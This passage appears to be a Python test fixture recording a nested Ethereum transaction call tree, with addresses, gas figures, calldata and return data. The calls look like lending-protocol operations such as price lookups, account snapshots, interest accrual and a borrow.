"0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001538b63e2c5ee5b3e8ac0000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [
{
"call_type": CallType.DELEGATECALL,
"address": HexBytes("0x7b5e3521a049c8ff88e6349f33044c6cc33c113c"),
"value": 0,
"depth": 0,
"gas_limit": 1075851,
"gas_cost": 116582,
"calldata": HexBytes(
"0x5ec88c79000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001538b63e2c5ee5b3e8ac0000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x4ddc2d193948926d02f9b1fe9e1daa0718270ed5"
),
"value": 0,
"depth": 0,
"gas_limit": 1052042,
"gas_cost": 7747,
"calldata": HexBytes(
"0xc37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003437612e40a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a5acfef01d00971b81cbd9"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x922018674c12a7f0d394ebeef9b58f186cde13c1"
),
"value": 0,
"depth": 0,
"gas_limit": 1040939,
"gas_cost": 2843,
"calldata": HexBytes(
"0xfc57d4df0000000000000000000000004ddc2d193948926d02f9b1fe9e1daa0718270ed5"
),
"returndata": HexBytes(
"0x00000000000000000000000000000000000000000000001ac09e6fd9f7658000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x5d3a536e4d6dbd6114cc1ead35777bab948e3643"
),
"value": 0,
"depth": 0,
"gas_limit": 1032806,
"gas_cost": 20072,
"calldata": HexBytes(
"0xc37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000abd7c1d14591f98d3565d2"
),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x5d3a536e4d6dbd6114cc1ead35777bab948e3643"
),
"value": 0,
"depth": 0,
"gas_limit": 1014374,
"gas_cost": 16646,
"calldata": HexBytes(
"0x0933c1ed00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000024c37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd00000000000000000000000000000000000000000000000000000000"
),
"returndata": HexBytes(
"0x00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000abd7c1d14591f98d3565d2"
),
"calls": [
{
"call_type": CallType.DELEGATECALL,
"address": HexBytes(
"0xbb8be4772faa655c255309afc3c5207aa7b896fd"
),
"value": 0,
"depth": 0,
"gas_limit": 996074,
"gas_cost": 13461,
"calldata": HexBytes(
"0xc37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000abd7c1d14591f98d3565d2"
),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x197e90f9fad81970ba7976f33cbd77088e5d7cf7"
),
"value": 0,
"depth": 0,
"gas_limit": 975069,
"gas_cost": 1215,
"calldata": HexBytes(
"0x0bebac860000000000000000000000005d3a536e4d6dbd6114cc1ead35777bab948e3643"
),
"returndata": HexBytes(
"0x00000000000000000000000000000000000000000120826dfebe6c4e87c468e0"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x197e90f9fad81970ba7976f33cbd77088e5d7cf7"
),
"value": 0,
"depth": 0,
"gas_limit": 972271,
"gas_cost": 1093,
"calldata": HexBytes("0xc92aecc4"),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000034a13ac9ed2cf6900e592bb"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x922018674c12a7f0d394ebeef9b58f186cde13c1"
),
"value": 0,
"depth": 0,
"gas_limit": 1009570,
"gas_cost": 2931,
"calldata": HexBytes(
"0xfc57d4df0000000000000000000000005d3a536e4d6dbd6114cc1ead35777bab948e3643"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000df84bed7768e000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x35a18000230da775cac24873d00ff85bccded550"
),
"value": 0,
"depth": 0,
"gas_limit": 1001349,
"gas_cost": 16641,
"calldata": HexBytes(
"0xc37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001d1225fe65e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a658d713a7d5c4a7a72ece"
),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x35a18000230da775cac24873d00ff85bccded550"
),
"value": 0,
"depth": 0,
"gas_limit": 983409,
"gas_cost": 13215,
"calldata": HexBytes(
"0x0933c1ed00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000024c37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd00000000000000000000000000000000000000000000000000000000"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001d1225fe65e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a658d713a7d5c4a7a72ece"
),
"calls": [
{
"call_type": CallType.DELEGATECALL,
"address": HexBytes(
"0x338f7e5d19d9953b76dd81446b142c2d9fe03482"
),
"value": 0,
"depth": 0,
"gas_limit": 965593,
"gas_cost": 10030,
"calldata": HexBytes(
"0xc37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001d1225fe65e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a658d713a7d5c4a7a72ece"
),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x1f9840a85d5af5bf1d1762f925bdaddc4201f984"
),
"value": 0,
"depth": 0,
"gas_limit": 945112,
"gas_cost": 1497,
"calldata": HexBytes(
"0x70a0823100000000000000000000000035a18000230da775cac24873d00ff85bccded550"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000acca862cc8349fcf261ae"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x922018674c12a7f0d394ebeef9b58f186cde13c1"
),
"value": 0,
"depth": 0,
"gas_limit": 981490,
"gas_cost": 3635,
"calldata": HexBytes(
"0xfc57d4df00000000000000000000000035a18000230da775cac24873d00ff85bccded550"
),
"returndata": HexBytes(
"0x00000000000000000000000000000000000000000000000033a760c1363e2000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0xf650c3d88d12db855b8bf7d11be6c55a4e07dcc9"
),
"value": 0,
"depth": 0,
"gas_limit": 972576,
"gas_cost": 19027,
"calldata": HexBytes(
"0xc37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000026cf3ea6a10000000000000000000000000000000000000000000000000000b9400555ff6100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0xf650c3d88d12db855b8bf7d11be6c55a4e07dcc9"
),
"value": 0,
"depth": 0,
"gas_limit": 955543,
"gas_cost": 16924,
"calldata": HexBytes(
"0x0933c1ed00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000024c37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd00000000000000000000000000000000000000000000000000000000"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000026cf3ea6a10000000000000000000000000000000000000000000000000000b9400555ff61"
),
"calls": [
{
"call_type": CallType.DELEGATECALL,
"address": HexBytes(
"0x976aa93ca5aaa569109f4267589c619a097f001d"
),
"value": 0,
"depth": 0,
"gas_limit": 938162,
"gas_cost": 13739,
"calldata": HexBytes(
"0xc37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000026cf3ea6a10000000000000000000000000000000000000000000000000000b9400555ff61"
),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0xdac17f958d2ee523a2206206994597c13d831ec7"
),
"value": 0,
"depth": 0,
"gas_limit": 915378,
"gas_cost": 2431,
"calldata": HexBytes(
"0x70a08231000000000000000000000000f650c3d88d12db855b8bf7d11be6c55a4e07dcc9"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000088ee804439c"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x922018674c12a7f0d394ebeef9b58f186cde13c1"
),
"value": 0,
"depth": 0,
"gas_limit": 950368,
"gas_cost": 2299,
"calldata": HexBytes(
"0xfc57d4df000000000000000000000000f650c3d88d12db855b8bf7d11be6c55a4e07dcc9"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000c9f2c9cd04674edea40000000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes("0x3d9819210a31b4961b30ef54be2aed79b9c9cd3b"),
"value": 0,
"depth": 0,
"gas_limit": 976290,
"gas_cost": 3073,
"calldata": HexBytes("0x7dc0d1d0"),
"returndata": HexBytes(
"0x000000000000000000000000922018674c12a7f0d394ebeef9b58f186cde13c1"
),
"calls": [
{
"call_type": CallType.DELEGATECALL,
"address": HexBytes("0x7b5e3521a049c8ff88e6349f33044c6cc33c113c"),
"value": 0,
"depth": 0,
"gas_limit": 959272,
"gas_cost": 1105,
"calldata": HexBytes("0x7dc0d1d0"),
"returndata": HexBytes(
"0x000000000000000000000000922018674c12a7f0d394ebeef9b58f186cde13c1"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": HexBytes("0xf650c3d88d12db855b8bf7d11be6c55a4e07dcc9"),
"value": 0,
"depth": 0,
"gas_limit": 971534,
"gas_cost": 3195,
"calldata": HexBytes("0xa6afed95"),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [
{
"call_type": CallType.DELEGATECALL,
"address": HexBytes("0x976aa93ca5aaa569109f4267589c619a097f001d"),
"value": 0,
"depth": 0,
"gas_limit": 954544,
"gas_cost": 1180,
"calldata": HexBytes("0xa6afed95"),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes("0x922018674c12a7f0d394ebeef9b58f186cde13c1"),
"value": 0,
"depth": 0,
"gas_limit": 966655,
"gas_cost": 2299,
"calldata": HexBytes(
"0xfc57d4df000000000000000000000000f650c3d88d12db855b8bf7d11be6c55a4e07dcc9"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000c9f2c9cd04674edea40000000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": HexBytes("0xf650c3d88d12db855b8bf7d11be6c55a4e07dcc9"),
"value": 0,
"depth": 0,
"gas_limit": 962207,
"gas_cost": 274012,
"calldata": HexBytes(
"0xc5ebeaec000000000000000000000000000000000000000000000000000000051f4d5c00"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [
{
"call_type": CallType.DELEGATECALL,
"address": HexBytes("0x976aa93ca5aaa569109f4267589c619a097f001d"),
"value": 0,
"depth": 0,
"gas_limit": 945272,
"gas_cost": 271908,
"calldata": HexBytes(
"0xc5ebeaec000000000000000000000000000000000000000000000000000000051f4d5c00"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [
{
"call_type": CallType.CALL,
"address": HexBytes(
"0x3d9819210a31b4961b30ef54be2aed79b9c9cd3b"
),
"value": 0,
"depth": 0,
"gas_limit": 920348,
"gas_cost": 193142,
"calldata": HexBytes(
"0xda3d454c000000000000000000000000f650c3d88d12db855b8bf7d11be6c55a4e07dcc9000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd000000000000000000000000000000000000000000000000000000051f4d5c00"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [
{
"call_type": CallType.DELEGATECALL,
"address": HexBytes(
"0x7b5e3521a049c8ff88e6349f33044c6cc33c113c"
),
"value": 0,
"depth": 0,
"gas_limit": 904186,
"gas_cost": 191162,
"calldata": HexBytes(
"0xda3d454c000000000000000000000000f650c3d88d12db855b8bf7d11be6c55a4e07dcc9000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd000000000000000000000000000000000000000000000000000000051f4d5c00"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x922018674c12a7f0d394ebeef9b58f186cde13c1"
),
"value": 0,
"depth": 0,
"gas_limit": 884632,
"gas_cost": 2299,
"calldata": HexBytes(
"0xfc57d4df000000000000000000000000f650c3d88d12db855b8bf7d11be6c55a4e07dcc9"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000c9f2c9cd04674edea40000000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x4ddc2d193948926d02f9b1fe9e1daa0718270ed5"
),
"value": 0,
"depth": 0,
"gas_limit": 874714,
"gas_cost": 7747,
"calldata": HexBytes(
"0xc37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003437612e40a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a5acfef01d00971b81cbd9"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x922018674c12a7f0d394ebeef9b58f186cde13c1"
),
"value": 0,
"depth": 0,
"gas_limit": 863610,
"gas_cost": 2843,
"calldata": HexBytes(
"0xfc57d4df0000000000000000000000004ddc2d193948926d02f9b1fe9e1daa0718270ed5"
),
"returndata": HexBytes(
"0x00000000000000000000000000000000000000000000001ac09e6fd9f7658000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x5d3a536e4d6dbd6114cc1ead35777bab948e3643"
),
"value": 0,
"depth": 0,
"gas_limit": 855477,
"gas_cost": 20072,
"calldata": HexBytes(
"0xc37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000abd7c1d14591f98d3565d2"
),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x5d3a536e4d6dbd6114cc1ead35777bab948e3643"
),
"value": 0,
"depth": 0,
"gas_limit": 839816,
"gas_cost": 16646,
"calldata": HexBytes(
"0x0933c1ed00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000024c37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd00000000000000000000000000000000000000000000000000000000"
),
"returndata": HexBytes(
"0x00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000abd7c1d14591f98d3565d2"
),
"calls": [
{
"call_type": CallType.DELEGATECALL,
"address": HexBytes(
"0xbb8be4772faa655c255309afc3c5207aa7b896fd"
),
"value": 0,
"depth": 0,
"gas_limit": 824243,
"gas_cost": 13461,
"calldata": HexBytes(
"0xc37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000abd7c1d14591f98d3565d2"
),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x197e90f9fad81970ba7976f33cbd77088e5d7cf7"
),
"value": 0,
"depth": 0,
"gas_limit": 805923,
"gas_cost": 1215,
"calldata": HexBytes(
"0x0bebac860000000000000000000000005d3a536e4d6dbd6114cc1ead35777bab948e3643"
),
"returndata": HexBytes(
"0x00000000000000000000000000000000000000000120826dfebe6c4e87c468e0"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x197e90f9fad81970ba7976f33cbd77088e5d7cf7"
),
"value": 0,
"depth": 0,
"gas_limit": 803124,
"gas_cost": 1093,
"calldata": HexBytes(
"0xc92aecc4"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000034a13ac9ed2cf6900e592bb"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x922018674c12a7f0d394ebeef9b58f186cde13c1"
),
"value": 0,
"depth": 0,
"gas_limit": 832241,
"gas_cost": 2931,
"calldata": HexBytes(
"0xfc57d4df0000000000000000000000005d3a536e4d6dbd6114cc1ead35777bab948e3643"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000df84bed7768e000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x35a18000230da775cac24873d00ff85bccded550"
),
"value": 0,
"depth": 0,
"gas_limit": 824021,
"gas_cost": 16641,
"calldata": HexBytes(
"0xc37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001d1225fe65e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a658d713a7d5c4a7a72ece"
),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x35a18000230da775cac24873d00ff85bccded550"
),
"value": 0,
"depth": 0,
"gas_limit": 808852,
"gas_cost": 13215,
"calldata": HexBytes(
"0x0933c1ed00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000024c37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd00000000000000000000000000000000000000000000000000000000"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001d1225fe65e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a658d713a7d5c4a7a72ece"
),
"calls": [
{
"call_type": CallType.DELEGATECALL,
"address": HexBytes(
"0x338f7e5d19d9953b76dd81446b142c2d9fe03482"
),
"value": 0,
"depth": 0,
"gas_limit": 793763,
"gas_cost": 10030,
"calldata": HexBytes(
"0xc37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001d1225fe65e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a658d713a7d5c4a7a72ece"
),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x1f9840a85d5af5bf1d1762f925bdaddc4201f984"
),
"value": 0,
"depth": 0,
"gas_limit": 775967,
"gas_cost": 1497,
"calldata": HexBytes(
"0x70a0823100000000000000000000000035a18000230da775cac24873d00ff85bccded550"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000acca862cc8349fcf261ae"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x922018674c12a7f0d394ebeef9b58f186cde13c1"
),
"value": 0,
"depth": 0,
"gas_limit": 804162,
"gas_cost": 3635,
"calldata": HexBytes(
"0xfc57d4df00000000000000000000000035a18000230da775cac24873d00ff85bccded550"
),
"returndata": HexBytes(
"0x00000000000000000000000000000000000000000000000033a760c1363e2000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0xf650c3d88d12db855b8bf7d11be6c55a4e07dcc9"
),
"value": 0,
"depth": 0,
"gas_limit": 795248,
"gas_cost": 19027,
"calldata": HexBytes(
"0xc37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000026cf3ea6a10000000000000000000000000000000000000000000000000000b9400555ff6100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0xf650c3d88d12db855b8bf7d11be6c55a4e07dcc9"
),
"value": 0,
"depth": 0,
"gas_limit": 780986,
"gas_cost": 16924,
"calldata": HexBytes(
"0x0933c1ed00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000024c37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd00000000000000000000000000000000000000000000000000000000"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000026cf3ea6a10000000000000000000000000000000000000000000000000000b9400555ff61"
),
"calls": [
{
"call_type": CallType.DELEGATECALL,
"address": HexBytes(
"0x976aa93ca5aaa569109f4267589c619a097f001d"
),
"value": 0,
"depth": 0,
"gas_limit": 766332,
"gas_cost": 13739,
"calldata": HexBytes(
"0xc37f68e2000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000026cf3ea6a10000000000000000000000000000000000000000000000000000b9400555ff61"
),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0xdac17f958d2ee523a2206206994597c13d831ec7"
),
"value": 0,
"depth": 0,
"gas_limit": 746233,
"gas_cost": 2431,
"calldata": HexBytes(
"0x70a08231000000000000000000000000f650c3d88d12db855b8bf7d11be6c55a4e07dcc9"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000088ee804439c"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x922018674c12a7f0d394ebeef9b58f186cde13c1"
),
"value": 0,
"depth": 0,
"gas_limit": 773040,
"gas_cost": 2299,
"calldata": HexBytes(
"0xfc57d4df000000000000000000000000f650c3d88d12db855b8bf7d11be6c55a4e07dcc9"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000c9f2c9cd04674edea40000000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0xf650c3d88d12db855b8bf7d11be6c55a4e07dcc9"
),
"value": 0,
"depth": 0,
"gas_limit": 763892,
"gas_cost": 1087,
"calldata": HexBytes("0xaa5af0fd"),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000e80cfd37ffe1008"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0xf650c3d88d12db855b8bf7d11be6c55a4e07dcc9"
),
"value": 0,
"depth": 0,
"gas_limit": 759180,
"gas_cost": 1154,
"calldata": HexBytes("0x47bd3718"),
"returndata": HexBytes(
"0x00000000000000000000000000000000000000000000000000001d139751603c"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0xf650c3d88d12db855b8bf7d11be6c55a4e07dcc9"
),
"value": 0,
"depth": 0,
"gas_limit": 739864,
"gas_cost": 9329,
"calldata": HexBytes(
"0x95dd9193000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x00000000000000000000000000000000000000000000000000000026cf3ea6a100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0xf650c3d88d12db855b8bf7d11be6c55a4e07dcc9"
),
"value": 0,
"depth": 0,
"gas_limit": 726410,
"gas_cost": 7205,
"calldata": HexBytes(
"0x0933c1ed0000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000002495dd9193000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd00000000000000000000000000000000000000000000000000000000"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000026cf3ea6a1"
),
"calls": [
{
